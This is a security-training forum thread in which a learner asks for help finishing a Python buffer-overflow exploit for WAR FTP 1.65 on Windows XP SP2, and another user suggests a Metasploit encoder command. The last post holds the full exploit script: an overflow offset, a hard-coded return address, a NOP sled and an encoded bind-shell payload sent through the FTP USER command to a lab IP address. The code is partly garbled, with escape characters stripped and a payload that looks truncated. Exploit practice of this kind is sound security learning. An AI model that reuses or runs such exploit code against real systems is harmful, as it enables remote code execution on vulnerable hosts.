Frustrated with Shellcode

Viewing 4 reply threads
  • Author
    Posts
    • #5236
      N3WB134444
      Participant

      I started coding the WAR FTP 1.65 Remote Code exploit in python to exploit a Win XP SP2 machine this morning and it’s still not finished:(. it went fine up until the point that shellcode had to be added.

      i managed to overwrite EIP with my A’s and eventually with a JMP EBP from my USR32.dl file and even managed to put in my breakpoints where my shellcode was supposed to go, everything worked with Ollydbg. but I kept failing at the shellcode which I generated with Msfpayload. I spent the rest of the day playing around with different  shellcodes trying to get the blasted thing to work, I played with different connecting shellcodes, vnc injects encoders and even filtering out bad characters, padding with Nops and the blasted thing still wouldn’t work.

      Could anybody please provide me with any tips for shellcode. I understand the difference between types of shells e.g bind and reverse but the different encoders are throwing me off. could I have just missed a bad character somewhere. Any help would be much appreciated thanks 🙂

    • #33202
      n1p
      Participant

      Better late than neveer 😉 I normally use the alpha upper encoder which should remove bad characters. I remember having problems with the gai-nai encoder and removing bad characters whilst exploiting a program previously.

      msfencode -e x86/alpha_upper -t c

      Paste that into your exploit code and see. Also happy to look at your code if necessary.

      http://seclists.org/metasploit/2006/q4/51 – possibly related

      cheers

    • #33203
      N3WB134444
      Participant

      Thanks very much for your help and wreply I will give it a go and let you know how it turns out

      Cheers

    • #33204
      n1p
      Participant

      No problem, do let us know how it turns out  😛

    • #33205
      N3WB134444
      Participant

      well i tried Alpha_Upper encoding, reviewed my code and couldn’t see anything that terminate the string. so here is my code.

      EIP was overwritten at the 476th byte.

      I used JMP EBP which i discovered in USER32.dll as it had more room for shellcode.

      I used a ./msfpaylod windows/shell_bind_tcp payload with the /x86/alpha
      encoder

      Any insight that you could provide would be most appreciative thanks

      #!/usr/bin/python
      import socket
      s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      shell=(“x89xe6xd9xc3xd9x76xf4x5ex56x59x49x49x49x49x43″”x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34″”x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41”
      “x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58”
      “x50x38x41x43x4ax4ax49x41x41”)
      ret = “x32xa4xd5x77”
      #EBP ADDRESS 77D5A432
      buffer = ‘x41’ *476 + ret + ‘x90’ *16 + ‘x90’ * 16 + shell
      print “nSending evil buffer…”
      s.connect ((‘10.16.250.4’,21))
      data=s.recv(1024)
      s.send(‘USER anonymous’ + buffer +’rn’)
      data = s.recv(1024)
      s.close()

Viewing 4 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?